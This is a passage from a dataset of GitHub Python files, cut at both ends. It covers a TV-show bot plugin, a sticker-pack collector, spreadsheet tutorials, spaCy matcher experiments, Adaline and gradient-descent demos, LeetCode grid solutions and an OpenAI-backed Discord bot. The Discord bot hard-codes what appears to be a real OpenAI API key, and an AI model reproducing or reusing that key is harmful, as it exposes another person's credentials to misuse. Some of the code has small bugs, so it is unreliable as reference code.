show[\"airs\"] + \"\\n*Quality:* \" + show[\"quality\"]})\n showlist.append({\"fallback\": \"Todays Shows\", \"fields\": fields})\n for show in tvlatest:\n fields = []\n fields.append({\"short\": False, \"title\": show[\"showname\"], \"value\": \"*Episode:* \" + show[\"showepisode\"] + \"\\n*Airs:* \" + show[\"airs\"] + \"\\n*Quality:* \" + show[\"quality\"]})\n showlist.append({\"fallback\": \"Next 7 days shows\", \"fields\": fields})\n # message = [{\"fallback\": \"blah\", \"pretext\": \"The following shows will download today:\", \"fields\": showlist}]\n message = showlist\n return message, True\n\n\nclass sickChillAPI:\n\n def __init__(self, url, apikey):\n self.rooturl = url\n self.apikey = apikey\n\n def Today(self):\n url = self.rooturl + '/api/' + self.apikey + '/?cmd=future&type=today'\n request = requests.get(url)\n json_data = json.loads(request.text)\n if json_data[\"result\"] != \"success\":\n return False\n elif json_data[\"result\"] == \"success\":\n if len(json_data[\"data\"][\"today\"]) == 0:\n return \"Empty\"\n shows = []\n for show in json_data[\"data\"][\"today\"]:\n ishow = {}\n ishow[\"showname\"] = show[\"show_name\"]\n ishow[\"showepisode\"] = show[\"ep_name\"]\n ishow[\"quality\"] = show[\"quality\"]\n ishow[\"airs\"] = show[\"airs\"]\n shows.append(ishow)\n return shows\n\n def Latest(self):\n url = self.rooturl + '/api/' + self.apikey + '/?cmd=future&type=soon'\n request = requests.get(url)\n json_data = json.loads(request.text)\n if json_data[\"result\"] != \"success\":\n return False\n elif json_data[\"result\"] == \"success\":\n if len(json_data[\"data\"][\"soon\"]) == 0:\n return \"Empty\"\n shows = []\n for show in json_data[\"data\"][\"soon\"]:\n ishow = {}\n ishow[\"showname\"] = show[\"show_name\"]\n ishow[\"showepisode\"] = show[\"ep_name\"]\n ishow[\"quality\"] = show[\"quality\"]\n ishow[\"airs\"] = show[\"airs\"]\n shows.append(ishow)\n return shows\n\n def searchTvShows(self, search):\n url = self.rooturl + '/api/' + self.apikey + '/?cmd=sb.searchindexers&only_new=0&name=' + search\n request = requests.get(url)\n json_data = json.loads(request.text)\n if json_data[\"result\"] != \"success\":\n return False\n elif json_data[\"result\"] == \"success\":\n if len(json_data[\"data\"][\"results\"]) == 0:\n return \"Empty\"\n shows = []\n for show in json_data[\"data\"][\"results\"]:\n ishow = {}\n ishow[\"first_aired\"] = show[\"first_aired\"]\n if show[\"in_show_list\"] is True:\n ishow[\"in_show_list\"] = \"Yes\"\n else:\n ishow[\"in_show_list\"] = \"No\"\n ishow[\"name\"] = show[\"name\"]\n ishow[\"id\"] = show[\"tvdbid\"]\n shows.append(ishow)\n return shows\n\n def downloadTvShow(self, id):\n url = self.rooturl + '/api/' + self.apikey + \"?cmd=show.addnew&indexerid=268592&status=ignored&tvdbid=\" + id\n request = requests.get(url)\n json_data = json.loads(request.text)\n if json_data[\"result\"] != \"success\":\n return json_data[\"message\"]\n elif json_data[\"result\"] == \"success\":\n return json_data[\"message\"]\n","repo_name":"OneLogicalMyth/monkey-bot","sub_path":"plugins/sickPotatoBot.py","file_name":"sickPotatoBot.py","file_ext":"py","file_size_in_byte":7170,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"6353681747","text":"import typing\n\nfrom sticker_parser.api import API\nfrom sticker_parser.models import StickerPack\n\n\nasync def get_section_sticker_packs(api: API, section_id: str, next_from: str = None) -> typing.List[dict]:\n packs = []\n data = api.send_api_request(\"catalog.getSection\", {\"section_id\": section_id, \"start_from\": next_from})\n if 'next_from' in data['response']['section'] and data['response']['section']['next_from']:\n packs += await get_section_sticker_packs(api, section_id, data['response']['section']['next_from'])\n return packs + list(map(lambda x: x[1], data['response']['stickers_packs'].items()))\n\n\nasync def get_all_sticker_packs(api: API) -> typing.List[dict]:\n packs = []\n sections = api.send_api_request(\"catalog.getStickers\", {\"need_blocks\": 0})\n for section in sections['response']['catalog']['sections']:\n packs += await get_section_sticker_packs(api, section['id'])\n\n unique_packs = []\n packs_ids = []\n\n for pack in packs:\n if pack['product']['id'] in packs_ids:\n continue\n packs_ids.append(pack['product']['id'])\n unique_packs.append(pack)\n return sorted(unique_packs, key=lambda x: x['product']['id'])\n\n\nasync def get_all_stickers(api: API, sticker_packs: typing.List[dict]) -> typing.List[dict]:\n keywords = api.send_api_request(\"store.getStickersKeywords\", {\n \"aliases\": 1,\n \"all_products\": 1,\n \"need_stickers\": 0\n })\n stickers = []\n for sticker_pack in sticker_packs:\n stickers += [\n {**sticker, \"product_id\": sticker_pack['product']['id']}\n for sticker in sticker_pack['product']['stickers']\n ]\n for dictionary in keywords['response']['dictionary']:\n for sticker in dictionary['stickers']:\n for index in range(len(stickers)):\n if stickers[index]['sticker_id'] == sticker['sticker_id']:\n stickers[index]['keywords'] = dictionary['words']\n break\n\n return stickers\n\n\nasync def collect_user_stickers(api: API, user_id: int) -> typing.List[dict]:\n gifts = api.send_api_request(\"gifts.getCatalog\", {\n \"no_inapp\": 0,\n \"user_id\": user_id,\n \"force_payment\": 1\n })\n stickers_gifts = [s for s in gifts['response'] if s['name'] in {'stickers_popular', 'stickers'}]\n stickers = []\n for sticker_gift in stickers_gifts:\n stickers += [item for item in sticker_gift['items'] if item.get('disabled', False)]\n stickers_ids = set([s['gift']['stickers_product_id'] for s in stickers])\n return [await sticker_pack.dict() async for sticker_pack in StickerPack.filter(id__in=stickers_ids)]\n\n\n\n","repo_name":"lordralinc/sticker_parser","sub_path":"sticker_parser/collectors.py","file_name":"collectors.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23897705727","text":"#pip means preffered installer programmer\r\nimport xlsxwriter\r\nworkbook=xlsxwriter.Workbook('employer.xlsx')\r\nworksheet=workbook.add_worksheet(\"My Sheet\")\r\nworksheet.write('A1','Hello')\r\nworksheet.write('A2','welcome')\r\nworksheet.write('A3','xlsxwriter')\r\nworksheet.write('A4','module')\r\nworkbook.close()\r\n\r\nprint(\"^^^^^^^^^^^^^^\")\r\n\r\nimport xlsxwriter\r\nworkbook=xlsxwriter.Workbook('employer.xlsx')\r\nworksheet=workbook.add_worksheet(\"My Sheet\")\r\nr=c=0\r\nl=['Gana' ,\"Vikas\", 'Anant']\r\nfor i in l:\r\n worksheet.write(r,c,i)\r\n r +=1\r\nworkbook.close()\r\nprint(\"&&&&&&&\")\r\n\r\nimport xlsxwriter\r\nworkbook=xlsxwriter.Workbook('employer.xlsx')\r\nworksheet=workbook.add_worksheet(\"My Sheet\")\r\nr=c=0\r\nl=[['Gana',30000] ,[\"Vikas\",29000], ['Anant',30000]]\r\nfor i in l:\r\n worksheet.write(r,c,i[0])\r\n c +=1\r\n worksheet.write(r,c,i[1])\r\n r +=1\r\n c=0\r\nworkbook.close()\r\n\r\nprint(\"%%%%%%%%\")\r\n\r\n\r\n\r\n'''import sqlite3\r\nconn=sqlite3.connect('example.db')\r\nname=input(\"Enter name:\")\r\ncursor=conn.cursor()\r\n\r\n\r\ntry:\r\n cursor.execute(\"INSERT INTO employee (name) VALUES (?)\",(name, ))\r\n conn.commit()\r\n print(\"'%d' record inserted\" %(cursor.rowcount))\r\nexcept Exception as e:\r\n print(\"Error:\",e)\r\nfinally:\r\n conn.close()'''\r\n\r\n\r\nimport sqlite3\r\nimport xlsxwriter\r\nworkbook=xlsxwriter.Workbook('demo1.xlsx')\r\nworksheet=workbook.add_worksheet(\"My Data\")\r\nconn=sqlite3.connect('example.db')\r\ncursor=conn.cursor()\r\nr=c=0\r\n\r\ntry:\r\n cursor.execute(\"\"\"select * from employee\"\"\")\r\n d=cursor.fetchall()\r\n for i in d:\r\n worksheet.write(r,c,i[0])\r\n c +=1\r\n worksheet.write(r,c,i[1])\r\nexcept Exception as e:\r\n print(\"Error:\",e)\r\nfinally:\r\n conn.close()","repo_name":"Mahesh2357/Python_Tutorials_23","sub_path":"day 29 last day.py","file_name":"day 29 last day.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"75297901928","text":"import os\nimport pickle\n\nfrom tensorflow.keras.models import load_model\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import classification_report, confusion_matrix\n\nimport src.utils as utils\n\n\nclass Estimator:\n def __init__(\n self, src_dir, dst_dir,\n est_file, cls_file, drs_file, srs_file, input_size):\n self.src_dir = src_dir\n self.dst_dir = dst_dir\n self.est_file = est_file\n self.cls_file = cls_file\n self.drs_file = drs_file\n self.srs_file = srs_file\n self.input_size = input_size\n\n def execute(self):\n estimator = load_model(self.est_file)\n\n with open(self.cls_file, 'rb') as f:\n cls_info = pickle.load(f)\n\n pred_labels, true_labels, output = [], [], []\n\n for subdir in os.listdir(self.src_dir):\n for f in os.listdir(os.path.join(self.src_dir, subdir)):\n filename = os.path.join(self.src_dir, subdir, f)\n img = utils.load_target_image(filename, self.input_size)\n pred_class = np.argmax(estimator.predict(img))\n pred_label = cls_info[pred_class]\n pred_labels.append(pred_label)\n\n true_label = subdir\n true_labels.append(true_label)\n\n output.append(f'{filename} -> {pred_label}')\n\n report = classification_report(true_labels, pred_labels)\n labels = list(cls_info.values())\n cnfmtx = confusion_matrix(true_labels, pred_labels, labels)\n cm = pd.DataFrame(cnfmtx, index=labels, columns=labels)\n\n utils.mkdir(self.dst_dir, rm=True)\n with open(self.drs_file, 'w') as f:\n f.writelines(output)\n\n with open(self.srs_file, 'w') as f:\n f.write(report)\n f.write('¥n¥n')\n f.write(str(cm))\n f.write('¥n')\n","repo_name":"fyk7/keras_image_cookiecutter","sub_path":"src/models/estimator.py","file_name":"estimator.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"7923364042","text":"import spacy \nfrom spacy.matcher import Matcher\nimport json\n\nnlp = spacy.load(\"en_core_web_sm\")\n\nmatcher = Matcher(nlp.vocab)\npattern = [\n {\"LIKE_EMAIL\":True}\n]\nmatcher.add(\"EMAIL_ADDRESS\", [pattern])\n\ndoc = nlp(\"Thsi is email address : abc@winner.com\")\nmatches = matcher(doc)\n# print(matches)\n\n# matches[0][0] is a lexeme\n# print(f'Label = {nlp.vocab[matches[0][0]].text}')\n\nwith open (\"data\\wiki_mlk.txt\", \"r\") as f:\n text = f.read()\n\n#grabing all proper noun followed with verb\nmatcher2 = Matcher(nlp.vocab)\npattern2 = [\n {\"POS\":\"PROPN\", \"OP\":\"+\"}, {\"POS\":'VERB'}\n # {\"IS_ALPHA\": True}, {\"IS_DIGIT\": True, \"OP\": \"+\"}\n]\nmatcher2.add(\"PROPER_NOUNS\",[pattern2], greedy='LONGEST')\ndoc2 = nlp(text)\nmatches2 = matcher2(doc2)\n# print(len(matches2))\nmatches2.sort(key=lambda x : x[1])\n# for match in matches2[:10]:\n# print(match, doc2[match[1]:match[2]])\n\n\n\n#grabbing speaker name who said the quote\n\nwith open(\"data/alice.json\",'r') as f:\n # for json file replace \\ -> / тнР\n data = json.load(f)\ntext3 = data[0][2][0]\ntext3 = text3.replace(\"`\",\"'\")\nprint(text3)\n\nspeak_lemmas = [\"think\", \"say\", \"tell\"]\n\nmatcher3 = Matcher(nlp.vocab)\npattern3 = [\n {\"ORTH\":\"'\"},\n {\"IS_ALPHA\": True, \"OP\": \"+\"}, \n {\"IS_PUNCT\":True, \"OP\": \"*\"},\n {\"ORTH\":\"'\"},\n {\"POS\":'VERB', \"LEMMA\":{'IN': speak_lemmas}},\n {\"POS\":\"PROPN\", \"OP\":\"+\"},\n {\"ORTH\":\"'\"},\n {\"IS_ALPHA\": True, \"OP\": \"+\"}, \n {\"IS_PUNCT\":True, \"OP\": \"*\"},\n {\"ORTH\":\"'\"}\n]\npattern4 = [{'ORTH': \"'\"},\n {'IS_ALPHA': True, \"OP\": \"+\"},\n {'IS_PUNCT': True, \"OP\": \"*\"}, {'ORTH': \"'\"},\n {\"POS\": \"VERB\", \"LEMMA\": {\"IN\": speak_lemmas}},\n {\"POS\": \"PROPN\", \"OP\": \"+\"}\n ]\npattern5 = [{\"POS\": \"PROPN\", \"OP\": \"+\"},\n{\"POS\": \"VERB\", \"LEMMA\": {\"IN\": speak_lemmas}},\n {'ORTH': \"'\"}, {'IS_ALPHA': True, \"OP\": \"+\"},\n {'IS_PUNCT': True, \"OP\": \"*\"},\n {'ORTH': \"'\"}\n ]\nmatcher3.add(\"PROPER_NOUNS\",[pattern3, pattern4, pattern5], greedy='LONGEST')\ndoc3 = nlp(text3)\nmatches3 = matcher3(doc3)\nprint(len(matches3))\nmatches3.sort(key=lambda x : x[1])\nfor match in matches3[:10]:\n print(match, doc3[match[1]:match[2]])","repo_name":"jigarsiddhpura/NLPwithSpacy","sub_path":"Matcher.py","file_name":"Matcher.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"10745994553","text":"import pandas as pd\r\nimport numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import style\r\ndef f(w,b,x):\r\n\treturn 1.0 / (1.0 + np.exp(-(w*x + b)))\r\ndef grad_w(w,b,x,y):\r\n\tfx = f(w,b,x)\r\n\treturn (fx - y ) * fx * (1 - fx) * x\r\n\r\ndef grad_b(w,b,x,y):\r\n\tfx = f(w,b,x)\r\n\treturn (fx - y ) * fx * (1 - fx)\r\n\r\ndef loss(w,b):\r\n\terror = 0\r\n\tfor x,y in zip(X,Y):\r\n\t\tfx = f(w,b,x)\r\n\t\terror += 0.5 * (fx - y) ** 2\r\n\t\treturn error\r\n\r\n\r\nfilename = 'data.csv'\r\ndf = pd.read_csv(filename)\r\nX = df ['x']\r\nY = df ['y']\r\n\r\ninit_w,init_b=1,1\r\nw_b_dw_db = [(init_w,init_b,0,0)]\r\nw_history,b_history,error_history,losshistory=[],[],[],[]\r\nw,b,eta,mini_batch_size,num_points_seen = init_w,init_b,0.01,10,0 \r\nm_w,m_b,v_w,v_b,eps,beta1,beta2,max_epochs=0,0,0,0,1e-8,0.9,0.99,1000\r\n\r\nfor i in range (max_epochs):\r\n\tdw,db = 0,0\r\n\tfor x,y in zip(X,Y):\r\n\t\tdw+= grad_w(w,b,x,y)\r\n\t\tdb+= grad_b(w,b,x,y)\r\n\t\t\r\n\tm_w = beta1 * m_w + (1 - beta1) * dw\r\n\tm_b = beta1 * m_b + (1 - beta1) * db\r\n\t\t\r\n\tv_w = beta2 * v_w + (1 - beta2) * dw ** 2\r\n\tv_b = beta2 * v_b + (1 - beta2) * db ** 2\r\n\t\t\r\n\tm_w_hat = m_w / (1 - math.pow(beta1,i+1))\r\n\tm_b_hat = m_b / (1 - math.pow(beta1,i+1))\r\n\t\t\r\n\tv_w_hat = v_w / (1 - math.pow(beta2,i+1))\r\n\tv_b_hat = v_b / (1 - math.pow(beta2,i+1))\r\n\t\t\r\n\tw = w - (eta / np.sqrt(v_w_hat + eps))* m_w_hat\r\n\tb = b - (eta / np.sqrt(v_b_hat + eps)) * m_b_hat \r\n\tr = loss(w,b)\r\n\tprint (r)\r\n\tlosshistory.append(r)\r\n\tplt.plot(losshistory)\r\n\t\r\nplt.show()\r\n\r\n\t\t\r\n\t\t\t\r\n\r\n\t\r\n\r\n\r\n\t\r\n\r\n\t\r\n","repo_name":"princeamitlali/gradient_descent","sub_path":"adamgradientdescent.py","file_name":"adamgradientdescent.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"15034551158","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef extend_matrix(X):\n return np.c_[np.ones((X.shape[0], 1)), X]\n\ndef normal_eq(Xe, y):\n return np.linalg.inv(Xe.T.dot(Xe)).dot(Xe.T).dot(y)\n\ndef normalize(x_to_norm, X):\n return (x_to_norm - np.mean(X, axis=0, dtype=np.float64)) / np.std(X, axis=0, dtype=np.float64)\n\ndef cost(Xe, y, beta):\n j = np.dot(Xe, beta)-y\n return (j.T.dot(j))/Xe.shape[0]\n\n# def gradient_descent(X, y, a = 0.0002, n = 20000000):\ndef gradient_descent(X, y, a = 0.01, n = 1000, plot = False):\n \"\"\"Perform gradient descent on the given X\"\"\"\n w = np.zeros(X.shape[1])\n costs = []\n for i in range(n):\n j = (X.T).dot(X.dot(w) - y)\n w = w - (a * j) / X.shape[0]\n costs.append(cost(X, y, w))\n if plot:\n plt.figure()\n plt.plot(range(n), costs)\n return w\n\n\ndef main():\n data = np.loadtxt(\"A2_datasets_2022/girls_height.csv\")\n\n X = data[:, 1:3]\n y = data[:, 0]\n\n plt.figure(\"Girl, mom\")\n plt.scatter(X[:, 0], y, marker=\".\", c=\"None\", edgecolors=\"black\")\n plt.xlabel(\"mom height\")\n plt.ylabel(\"girl height\")\n\n plt.figure(\"Girl, dad\")\n plt.xlabel(\"dad height\")\n plt.ylabel(\"girl height\")\n plt.scatter(X[:, 1], y, marker=\".\", c=\"None\", edgecolors=\"black\")\n\n Xe = extend_matrix(X)\n beta = normal_eq(Xe, y)\n\n print(beta)\n print(cost(Xe, y, beta))\n ug1 = [1, 65, 70]\n\n print(np.dot(ug1, beta))\n\n Xn = normalize(X, X)\n plt.figure(\"Girl, mom, Feature normalization\")\n plt.scatter(Xn[:, 0], y, marker=\".\", c=[[0,0,0,0]], edgecolors=\"black\")\n\n plt.figure(\"Girl, dad, Feature normalization\")\n plt.scatter(Xn[:, 1], y, marker=\".\", c=[[0,0,0,0]], edgecolors=\"black\")\n\n Xne = extend_matrix(Xn)\n beta_n = normal_eq(Xne, y)\n print(beta_n)\n print(cost(Xne, y, beta_n))\n ug1_n = normalize(np.array([65, 70]), X)\n print(np.dot(np.append([1], ug1_n), beta_n))\n # exit()\n print()\n print()\n print()\n\n # Gradient descent on non-normalized X\n # res = gradient_descent(Xe, y, a = 0.0002, n = 20000000)\n \n # Gradient descent on normalized X\n beta_gradient = gradient_descent(Xne, y, a = 0.05, n = 200, plot = True)\n print(\"Normalization, gradient descent:\")\n print(\" Height:\", np.dot(np.append([1], ug1_n), beta_gradient))\n print(\" Cost: \", cost(Xne, y, beta_gradient))\n\n\n\n\n plt.show()\n # print(cost(Xe, y, beta))\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"oenstrom/2DV516_A2","sub_path":"exerciseA.py","file_name":"exerciseA.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31065001016","text":"import collections\nfrom typing import List\n\n\ndef longest1():\n def longestLine(M: List[List[int]]) -> int:\n row = collections.defaultdict(int)\n col = collections.defaultdict(int)\n ad = collections.defaultdict(int) # Ascending diagonal\n dd = collections.defaultdict(int) # Descending diagonal\n mx = 0\n for i in range(len(M)):\n for j in range(len(M[0])):\n if not M[i][j]:\n row[i] = col[j] = ad[j + i] = dd[j - i] = 0\n else:\n row[i] += 1\n col[j] += 1\n ad[j + i] += 1\n dd[j - i] += 1\n mx = max(mx, row[i], col[j], ad[j + i], dd[j - i])\n return mx\n\n mat = [[0, 1, 1, 0], [0, 1, 1, 0], [0, 0, 0, 1]]\n longestLine(mat)\n\n\ndef max_connected_island():\n def maxAreaOfIsland(grid: List[List[int]]) -> int:\n\n def explore(grid, r, c) -> int:\n if r >= len(grid) or r < 0 or c >= len(grid[0]) or col < 0:\n return 0\n if grid[r][c] == 0:\n return 0\n grid[r][c] = 0\n return 1 + explore(grid, r - 1, c) + explore(grid, r, c - 1) + explore(grid, r + 1, c) + explore(grid, r, c + 1)\n\n row = len(grid)\n col = len(grid[0])\n max_area = 0\n for i in range(row):\n for j in range(col):\n if grid[i][j] == 1:\n max_area = max(max_area, explore(grid, i, j))\n return max_area\n\n print(maxAreaOfIsland(grid = [[0,0,1,0,0,0,0,1,0,0,0,0,0],[0,0,0,0,0,0,0,1,1,1,0,0,0],[0,1,1,0,1,0,0,0,0,0,0,0,0],[0,1,0,0,1,1,0,0,1,0,1,0,0],[0,1,0,0,1,1,0,0,1,1,1,0,0],[0,0,0,0,0,0,0,0,0,0,1,0,0],[0,0,0,0,0,0,0,1,1,1,0,0,0],[0,0,0,0,0,0,0,1,1,0,0,0,0]]))\n\ndef robot_clean():\n def cleanRoom(robot):\n \"\"\"\n :type robot: Robot\n :rtype: None\n \"\"\"\n dfs(robot, 0, 0, 0, 1, set())\n\n def dfs(robot, x, y, direction_x, direction_y, visited):\n robot.clean()\n visited.add((x, y))\n\n for k in range(4):\n neighbor_x = x + direction_x\n neighbor_y = y + direction_y\n if (neighbor_x, neighbor_y) not in visited and robot.move():\n dfs(robot, neighbor_x, neighbor_y, direction_x, direction_y, visited)\n robot.turnLeft()\n robot.turnLeft()\n robot.move()\n robot.turnLeft()\n robot.turnLeft()\n robot.turnLeft()\n direction_x, direction_y = -direction_y, direction_x\n\n room = [[1, 1, 1, 1, 1, 0, 1, 1], [1, 1, 1, 1, 1, 0, 1, 1], [1, 0, 1, 1, 1, 1, 1, 1], [0, 0, 0, 1, 0, 0, 0, 0],\n [1, 1, 1, 1, 1, 1, 1, 1]]\n cleanRoom(room)\n\n\nclass Solution:\n def cleanRoom(self, robot):\n def dfs( robot, x, y, direction_x, direction_y, visited):\n robot.clean()\n visited.add((x, y))\n\n for k in range(4):\n neighbor_x = x + direction_x\n neighbor_y = y + direction_y\n if (neighbor_x, neighbor_y) not in visited and robot.move():\n dfs(robot, neighbor_x, neighbor_y, direction_x, direction_y, visited)\n robot.turnLeft()\n robot.turnLeft()\n robot.move()\n robot.turnLeft()\n robot.turnLeft()\n robot.turnLeft()\n direction_x, direction_y = -direction_y, direction_x\n dfs(robot, 0, 0, 0, 1, set())\n\n\ndef max_min_mat():\n seen = set()\n res=[]\n\n def maximumMinimumPath(grid: List[List[int]]) -> int:\n\n def dfs(grid, i, j):\n queue = collections.deque([(i,j),])\n temp=[]\n\n while queue:\n m,n = queue.popleft()\n temp.append(grid[m][n])\n seen.add((m, n))\n for r, c in (m + 1, n), (m - 1, n), (m, n + 1), (m, n - 1):\n if r>=len(grid[0]) or r<0 or c>=len(grid[0]) or c<0:\n continue\n elif r == len(grid)-1 and c==len(grid[0])-1:\n if res and sum(temp) > sum(res[-1]):\n res.append(temp)\n elif not res:\n res.append(temp)\n elif (r,c) not in seen:\n seen.add((r,c))\n queue.append((r,c))\n\n\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if (i,j) not in seen:\n dfs(grid, i, j)\n max_sum=0\n idx = 0\n for j, i in enumerate(res):\n if sum(i)>max_sum:\n idx = j\n max_sum = sum(i)\n print(\"Res \", res)\n return min(res[idx])\n\n grid = [[5, 4, 5], [1, 2, 6], [7, 4, 6]]\n print(maximumMinimumPath(grid))\n\ndef shortest_path():\n def shortestPathBinaryMatrix( grid: List[List[int]]) -> int:\n max_row = len(grid) - 1\n max_col = len(grid[0]) - 1\n directions = [(-1, 0), (0, -1), (0, 1), (1, 0)]\n\n # Helper function to find the neighbors of a given cell.\n def get_neighbours(row, col):\n for row_difference, col_difference in directions:\n new_row = row + row_difference\n new_col = col + col_difference\n if not (0 <= new_row <= max_row and 0 <= new_col <= max_col):\n continue\n if grid[new_row][new_col] != 0:\n continue\n yield (new_row, new_col)\n\n # Check that the first and last cells are open.\n if grid[0][0] != 0 or grid[max_row][max_col] != 0:\n return -1\n\n # Set up the BFS.\n queue = collections.deque()\n queue.append((0, 0))\n grid[0][0] = 1\n\n # Carry out the BFS.\n while queue:\n row, col = queue.popleft()\n distance = grid[row][col]\n if (row, col) == (max_row, max_col):\n return distance\n for neighbour_row, neighbour_col in get_neighbours(row, col):\n grid[neighbour_row][neighbour_col] = distance + 1\n queue.append((neighbour_row, neighbour_col))\n\n # There was no path.\n return -1\n\n grid = [[0, 0, 0], [1, 1, 0], [1, 1, 0]]\n print(shortestPathBinaryMatrix(grid))\n\nshortest_path()\n","repo_name":"arpith-kp/interviewrelated","sub_path":"leetcode_matrix.py","file_name":"leetcode_matrix.py","file_ext":"py","file_size_in_byte":6398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31314275247","text":"import sys\nsys.path.append(\"/home/ubuntu/workspace/ml_dev_work\")\nimport pdb\nimport matplotlib as mpl\nmpl.use('Agg')\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom numpy.random import seed\nfrom utils.ml_utils import update_check\n\nIMG_PATH = '/home/ubuntu/workspace/finance/app/static/img/ml_imgs/'\n\nclass AdalineSGD(object):\n \"\"\"ADAptive LInear NEuron classifier.\n\n Parameters\n ------------\n eta : float\n Learning rate (between 0.0 and 1.0)\n n_iter : int\n Passes over the training dataset.\n\n Attributes\n -----------\n w_ : 1d-array\n Weights after fitting.\n errors_ : list\n Number of misclassifications in every epoch.\n shuffle : bool (default: True)\n Shuffles training data every epoch if True to prevent cycles.\n random_state : int (default: None)\n Set random state for shuffling and initializing the weights.\n \n \"\"\"\n def __init__(self, eta=0.01, n_iter=10, shuffle=True, random_state=None):\n self.eta = eta\n self.n_iter = n_iter\n self.w_initialized = False\n self.shuffle = shuffle\n if random_state:\n seed(random_state)\n \n def fit(self, X, y):\n \"\"\" Fit training data.\n\n Parameters\n ----------\n X : {array-like}, shape = [n_samples, n_features]\n Training vectors, where n_samples is the number of samples and\n n_features is the number of features.\n y : array-like, shape = [n_samples]\n Target values.\n\n Returns\n -------\n self : object\n\n \"\"\"\n self._initialize_weights(X.shape[1])\n self.cost_ = []\n for i in range(self.n_iter):\n # data needs to be presented in random order\n if self.shuffle:\n X, y = self._shuffle(X, y)\n cost = []\n for xi, target in zip(X, y):\n # update weights \"on-the-fly\" after each sample unlike regular adaline gradient descent\n # Other than that, very similar to adalineGD\n cost.append(self._update_weights(xi, target))\n avg_cost = sum(cost)/len(y)\n self.cost_.append(avg_cost)\n return self\n\n def partial_fit(self, X, y):\n \"\"\"Fit training data without reinitializing the weights\"\"\"\n # This can be used to continue learning on a model after weights have already been tuned to some extent\n if not self.w_initialized:\n self._initialize_weights(X.shape[1])\n if y.ravel().shape[0] > 1:\n for xi, target in zip(X, y):\n self._update_weights(xi, target)\n else:\n self._update_weights(X, y)\n return self\n\n def _shuffle(self, X, y):\n \"\"\"Shuffle training data\"\"\"\n r = np.random.permutation(len(y))\n return X[r], y[r]\n \n def _initialize_weights(self, m):\n \"\"\"Initialize weights to zeros\"\"\"\n self.w_ = np.zeros(1 + m)\n self.w_initialized = True\n \n def _update_weights(self, xi, target):\n \"\"\"Apply Adaline learning rule to update the weights\"\"\"\n output = self.net_input(xi)\n error = (target - output)\n # Same as adalineGD where the weights are updated even if prediction is right\n self.w_[1:] += self.eta * xi.dot(error)\n self.w_[0] += self.eta * error\n cost = 0.5 * error**2\n print(str(self.w_) + \"----\" + str(xi))\n return cost\n \n def net_input(self, X):\n \"\"\"Calculate net input\"\"\"\n return np.dot(X, self.w_[1:]) + self.w_[0]\n\n def activation(self, X):\n \"\"\"Compute linear activation\"\"\"\n return self.net_input(X)\n\n def predict(self, X):\n \"\"\"Return class label after unit step\"\"\"\n return np.where(self.activation(X) >= 0.0, 1, -1)","repo_name":"mccarvik/python_for_finance","sub_path":"research/ml_analysis/algorithms/adalinesgd.py","file_name":"adalinesgd.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"39113736503","text":"import os\nimport discord\nfrom discord.ext import commands\n\n\nimport openai\nimport discord\nfrom discord.ext import commands\n\n# OpenAI API anahtarı ve Discord bot token'ı\nopenai.api_key = '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'\n\n# Discord bot token'ı\n# Discord Intents ayarı\nintents = discord.Intents.default()\nintents.messages = True\nintents.message_content = True\n\nbot = commands.Bot(command_prefix='kodland!', intents=intents)\n\n# Sohbet oturumu için bir dictionary yapısı.\nchat_sessions = {}\n\n@bot.event\nasync def on_ready():\n print(f'{bot.user.name} has connected to Discord!')\n\n@bot.command(name='chat')\nasync def chat(ctx, *, message):\n user_id = str(ctx.author.id)\n\n # Kullanıcının mevcut oturum ID'sini al.\n session_id = chat_sessions.get(user_id)\n\n # Kullanıcının mesajı ile bir mesaj listesi oluştur.\n messages = [\n {\"role\": \"system\", \"content\": \"senin adın Kodland Canlı Destek ve yardım sever bir asistansın, birisi sana adını sorduğunda adım Kodland Canlı Destek Demelisin\"},\n {\"role\": \"user\", \"content\": message}\n ]\n\n # ChatCompletion çağrısı yaparken session_id varsa ekleyin.\n chat_params = {\n \"model\": \"gpt-4\",\n \"messages\": messages\n }\n\n if session_id:\n chat_params[\"session_id\"] = session_id\n\n # ChatCompletion çağrısı.\n response = openai.ChatCompletion.create(**chat_params)\n\n # Cevabı ve yeni oturum ID'sini kaydet.\n # 'choices' içerisinden 'data' ve oradan da 'session_id' anahtarına ulaşılır.\n if 'data' in response['choices'][0]:\n chat_sessions[user_id] = response['choices'][0]['data']['session_id']\n else:\n # İlk yanıtta session_id yoksa, bu bir başlangıç yanıtıdır ve oturum ID'si henüz oluşturulmamış olabilir.\n # Bu durumda, bu kullanıcı için henüz bir session_id yok demektir.\n pass\n\n answer = response['choices'][0]['message']['content']\n\n # Gelen yanıtı Discord'da gönder.\n await ctx.send(answer)\n\n# Botu 